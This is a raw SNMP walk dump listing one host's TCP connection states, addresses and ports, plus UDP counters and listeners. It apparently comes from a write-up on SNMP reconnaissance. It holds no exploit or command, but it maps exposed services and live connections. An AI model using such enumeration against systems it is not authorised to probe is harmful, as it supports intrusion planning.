tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.22.12.32.42.194.1023 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.53.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: closeWait(8)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.14.11.15.193.53.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.7.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.9.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.13.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.19.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.21.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.22.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.23.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.25.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.37.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.79.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.80.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.110.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.111.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.113.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.515.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3046.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3128.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3333.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.4444.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.53.0.0.0.0.0 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3644.127.0.0.1.3645 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3645.127.0.0.1.3644 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3646.127.0.0.1.3647 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3647.127.0.0.1.3646 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3648.127.0.0.1.3649 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3649.127.0.0.1.3648 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3650.127.0.0.1.3651 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3651.127.0.0.1.3650 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3652.127.0.0.1.3653 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3653.127.0.0.1.3652 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3654.127.0.0.1.3655 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3655.127.0.0.1.3654 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3656.127.0.0.1.3657 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3657.127.0.0.1.3656 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.22.12.32.42.194.1023 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.53.0.0.0.0.0 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.2747.34.42.134.6.6667 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1433 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1435 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1436 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1437 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.194.1487 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.210.1517 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.210.1524 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3333.12.32.42.199.1038 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.4205.34.42.134.6.8080 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.4446.34.42.134.6.8080 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.14.11.15.193.53.0.0.0.0.0 = IpAddress: 14.11.15.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.7.0.0.0.0.0 = INTEGER: 7
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.9.0.0.0.0.0 = INTEGER: 9
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.13.0.0.0.0.0 = INTEGER: 13
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.19.0.0.0.0.0 = INTEGER: 19
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.21.0.0.0.0.0 = INTEGER: 21
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.22.0.0.0.0.0 = INTEGER: 22
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.23.0.0.0.0.0 = INTEGER: 23
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.25.0.0.0.0.0 = INTEGER: 25
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.37.0.0.0.0.0 = INTEGER: 37
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.79.0.0.0.0.0 = INTEGER: 79
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.80.0.0.0.0.0 = INTEGER: 80
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.110.0.0.0.0.0 = INTEGER: 110
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.111.0.0.0.0.0 = INTEGER: 111
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.113.0.0.0.0.0 = INTEGER: 113
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.515.0.0.0.0.0 = INTEGER: 515
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3046.0.0.0.0.0 = INTEGER: 3046
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3128.0.0.0.0.0 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3333.0.0.0.0.0 = INTEGER: 3333
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.4444.0.0.0.0.0 = INTEGER: 4444
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: 3644
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: 3645
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: 3646
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: 3647
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: 3648
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: 3649
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: 3650
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: 3651
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: 3652
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: 3653
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: 3654
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: 3655
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: 3656
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: 3657
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.22.12.32.42.194.1023 = INTEGER: 22
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: 2747
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: 3333
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: 4205
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: 4446
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.14.11.15.193.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.7.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.9.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.13.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.19.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.21.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.22.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.23.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.25.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.37.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.79.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.80.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.110.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.111.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.113.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.515.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3046.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3128.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.3333.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.0.0.0.0.4444.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3644.127.0.0.1.3645 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3645.127.0.0.1.3644 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3646.127.0.0.1.3647 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3647.127.0.0.1.3646 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3648.127.0.0.1.3649 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3649.127.0.0.1.3648 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3650.127.0.0.1.3651 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3651.127.0.0.1.3650 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3652.127.0.0.1.3653 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3653.127.0.0.1.3652 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3654.127.0.0.1.3655 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3655.127.0.0.1.3654 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3656.127.0.0.1.3657 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.127.0.0.1.3657.127.0.0.1.3656 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.22.12.32.42.194.1023 = IpAddress: 12.32.42.194
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.2747.34.42.134.6.6667 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1433 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1435 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1436 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.192.168.0.25.1437 = IpAddress: 192.168.0.25
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.194.1487 = IpAddress: 12.32.42.194
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.210.1517 = IpAddress: 12.32.42.210
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3128.12.32.42.210.1524 = IpAddress: 12.32.42.210
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.3333.12.32.42.199.1038 = IpAddress: 12.32.42.199
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.4205.34.42.134.6.8080 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.12.32.42.193.4446.34.42.134.6.8080 = IpAddress: 34.42.134.6
tcp.tcpConnTable.tcpConnEntry.tcpConnRemAddress.14.11.15.193.53.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.7.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.9.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.13.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.19.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.21.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.22.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.23.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.25.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.37.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.79.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.80.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.110.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.111.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.113.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.515.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3046.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3128.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.3333.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.0.0.0.0.4444.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.53.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: 3645
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: 3644
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: 3647
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: 3646
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: 3649
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: 3648
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: 3651
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: 3650
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: 3653
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: 3652
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: 3655
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: 3654
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: 3657
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: 3656
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.22.12.32.42.194.1023 = INTEGER: 1023
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.53.0.0.0.0.0 = INTEGER: 0
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: 6667
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: 1433
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: 1435
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: 1436
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: 1437
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: 1487
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: 1517
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: 1524
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: 1038
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: 8080
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: 8080
tcp.tcpConnTable.tcpConnEntry.tcpConnRemPort.14.11.15.193.53.0.0.0.0.0 = INTEGER: 0

 <[ Established TCP connections........ ]>

tcp.tcpInErrs.0 = Counter: 610
tcp.tcpOutRsts.0 = Counter: 20085
udp.udpInDatagrams.0 = Counter: 2142957
udp.udpNoPorts.0 = Counter: 3135
udp.udpInErrors.0 = Counter: 0
udp.udpOutDatagrams.0 = Counter: 2174841
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.37 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.111 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.161 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.514 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.517 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.518 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.800 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.1854 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.2173 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.0.0.0.0.3130 = IpAddress: 0.0.0.0
udp.udpTable.udpEntry.udpLocalAddress.127.0.0.1.53 = IpAddress: 127.0.0.1
udp.udpTable.udpEntry.udpLocalAddress.12.32.42.193.53 = IpAddress: 12.32.42.193
udp.udpTable.udpEntry.udpLocalAddress.14.11.15.193.53 = IpAddress: 14.11.15.193
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.37 = INTEGER: 37
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.111 = INTEGER: 111
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.161 = INTEGER: 161
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.514 = INTEGER: 514
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.517 = INTEGER: 517
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.518 = INTEGER: 518
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.800 = INTEGER: 800
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.1854 = INTEGER: 1854
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.2173 = INTEGER: 2173
udp.udpTable.udpEntry.udpLocalPort.0.0.0.0.3130 = INTEGER: 3130
